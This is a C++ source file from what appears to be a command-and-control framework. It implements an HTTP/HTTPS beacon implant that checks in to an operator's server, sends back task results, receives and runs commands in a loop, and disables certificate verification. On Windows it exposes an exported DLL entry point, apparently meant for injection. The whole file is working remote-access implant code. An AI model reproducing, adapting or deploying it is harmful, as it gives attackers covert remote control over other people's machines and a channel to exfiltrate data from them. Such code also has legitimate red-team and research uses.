Files
maxDcb-C2Core/beacon/BeaconHttp.cpp
T
Maxime DE CAUMIA BAILLENX 0a454e8ecd Inital commit
2023-04-26 08:28:46 +02:00

337 lines
7.9 KiB
C++

#include "BeaconHttp.hpp"
#include "Config.hpp"
#ifdef __linux__
#define CPPHTTPLIB_OPENSSL_SUPPORT
#include "../thirdParty/cpp-httplib/httplib.h"
#elif _WIN32
#include <WinHttp.h>
#pragma comment(lib, "winhttp.lib")
#endif
using namespace std;
#ifdef __linux__
using namespace httplib;
const httplib::Headers httpClientHeaders = {
{ "Accept-Encoding", "gzip, deflate" },
{ "Authorization", "Bearer dgfghlsfojdojsdgsghsfgdssfsdsqffgcd" },
{ "User-Agent", "http client agent" }
};
const httplib::Headers httpsClientHeaders = {
{ "Accept-Encoding", "gzip, deflate" },
{ "User-Agent", "https client agent" }
};
#elif _WIN32
std::wstring getUtf16(const std::string& str, int codepage)
{
if (str.empty())
return std::wstring();
int sz = MultiByteToWideChar(codepage, 0, &str[0], (int)str.size(), 0, 0);
std::wstring res(sz, 0);
MultiByteToWideChar(codepage, 0, &str[0], (int)str.size(), &res[0], sz);
return res;
}
string HttpsWebRequestPost(const string& domain, int port, const string& url, const string& data, bool isHttps)
{
wstring sdomain = getUtf16(domain, CP_UTF8);
wstring surl = getUtf16(url, CP_UTF8);
DWORD dwSize = 0;
LPSTR pszOutBuffer;
BOOL bResults = FALSE;
HINTERNET hSession = NULL, hConnect = NULL, hRequest = NULL;
// Use WinHttpOpen to obtain a session handle.
hSession = WinHttpOpen(L"WinHTTP Example/1.0",
WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
WINHTTP_NO_PROXY_NAME,
WINHTTP_NO_PROXY_BYPASS,
0);
// Specify an HTTP server.
if (hSession)
hConnect = WinHttpConnect(hSession,
sdomain.c_str(),
port,
0);
// Create an HTTP request handle.
DWORD dwFlags = 0;
if(isHttps)
{
dwFlags = WINHTTP_FLAG_REFRESH | WINHTTP_FLAG_SECURE;
}
if (hConnect)
hRequest = WinHttpOpenRequest(hConnect,
L"POST",
surl.c_str(),
NULL,
WINHTTP_NO_REFERER,
WINHTTP_DEFAULT_ACCEPT_TYPES,
dwFlags);
LPCWSTR additionalHeaders = L"Content-Type: text/plain\r\n";
DWORD headersLength = -1;
if(isHttps)
{
// if https & self sign certificat
dwFlags =
SECURITY_FLAG_IGNORE_UNKNOWN_CA |
SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE |
SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
WinHttpSetOption(
hRequest,
WINHTTP_OPTION_SECURITY_FLAGS,
&dwFlags,
sizeof(dwFlags));
}
// Post data
LPSTR pdata = const_cast<char*>(data.c_str());;
DWORD lenData = data.size();
// Send a request.
if (hRequest)
bResults = WinHttpSendRequest(hRequest,
additionalHeaders,
headersLength,
(LPVOID)pdata,
lenData,
lenData,
0);
// if (!bResults)
// printf("Error %d has occurred.\n", GetLastError());
// End the request.
if (bResults)
bResults = WinHttpReceiveResponse(hRequest, NULL);
DWORD dwStatusCode = 0;
dwSize = sizeof(dwStatusCode);
WinHttpQueryHeaders(hRequest,
WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER,
WINHTTP_HEADER_NAME_BY_INDEX,
&dwStatusCode, &dwSize, WINHTTP_NO_HEADER_INDEX);
// Keep checking for data until there is nothing left.
string response;
if (bResults)
{
do
{
// Check for available data.
dwSize = 0;
if (!WinHttpQueryDataAvailable(hRequest, &dwSize))
{
// printf("Error %u in WinHttpQueryDataAvailable.\n", GetLastError());
}
// Allocate space for the buffer.
pszOutBuffer = new char[dwSize + 1];
if (!pszOutBuffer)
{
// printf("Out of memory\n");
dwSize = 0;
}
else
{
// Read the data.
ZeroMemory(pszOutBuffer, dwSize + 1);
DWORD dwDownloaded = 0;
if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded))
{
// printf("Error %u in WinHttpReadData.\n", GetLastError());
}
else
{
//printf("%s", pszOutBuffer);
response = response + string(pszOutBuffer);
}
// Free the memory allocated to the buffer.
delete[] pszOutBuffer;
}
} while (dwSize > 0);
}
// Report any errors.
// if (!bResults)
// printf("Error %d has occurred.\n", GetLastError());
// Close any open handles.
if (hRequest)
WinHttpCloseHandle(hRequest);
if (hConnect)
WinHttpCloseHandle(hConnect);
if (hSession)
WinHttpCloseHandle(hSession);
return response;
}
#endif
BeaconHttp::BeaconHttp(std::string& ip, int port, bool isHttps)
: Beacon(ip, port)
, m_isHttps(isHttps)
{
}
BeaconHttp::~BeaconHttp()
{
}
void BeaconHttp::checkIn()
{
#ifdef __linux__
if(m_isHttps)
{
httplib::SSLClient cli(m_ip, m_port);
cli.enable_server_certificate_verification(false);
std::string output;
taskResultsToCmd(output);
if (auto res = cli.Post(HttpsEndPoint, httpsClientHeaders, output, HttpsContentType))
{
if (res->status == 200)
{
std::string input = res->body;
if(!input.empty())
{
cmdToTasks(input);
}
}
}
}
else
{
httplib::Client cli(m_ip, m_port);
std::string output;
taskResultsToCmd(output);
if (auto res = cli.Post(HttpEndPoint, httpClientHeaders, output, HttpContentType))
{
if (res->status == 200)
{
std::string input = res->body;
if(!input.empty())
{
cmdToTasks(input);
}
}
}
}
#elif _WIN32
std::string endPoint = HttpEndPoint;
std::string contentType = HttpContentType;
if(m_isHttps)
{
endPoint = HttpsEndPoint;
contentType = HttpsContentType;
}
std::string output;
taskResultsToCmd(output);
std::string input = HttpsWebRequestPost(m_ip, m_port, endPoint, output, m_isHttps);
if (!input.empty())
{
cmdToTasks(input);
}
#endif
}
#ifdef __linux__
#elif _WIN32
extern "C" __declspec(dllexport) int go(PCHAR argv)
{
// OutputDebugStringA("HelperFunc was executed");
// OutputDebugStringA(argv);
std::vector<std::string> splitedCmd;
std::string delimiter = " ";
splitList(argv, delimiter, splitedCmd);
// OutputDebugStringA(splitedCmd[0].c_str());
// OutputDebugStringA(splitedCmd[1].c_str());
// OutputDebugStringA(splitedCmd[2].c_str());
if (splitedCmd.size() == 3)
{
std::string ip = splitedCmd[0];
int port = -1;
try
{
port = stoi(splitedCmd[1]);
}
catch (...)
{
return 1;
}
bool https = true;
std::string sHttps = splitedCmd[2];
if(sHttps=="https")
https=true;
std::unique_ptr<Beacon> beacon;
beacon = make_unique<BeaconHttp>(ip, port, https);
bool exit = false;
while (!exit)
{
beacon->checkIn();
exit = beacon->runTasks();
beacon->sleep();
}
beacon->checkIn();
}
return 0;
}
#endif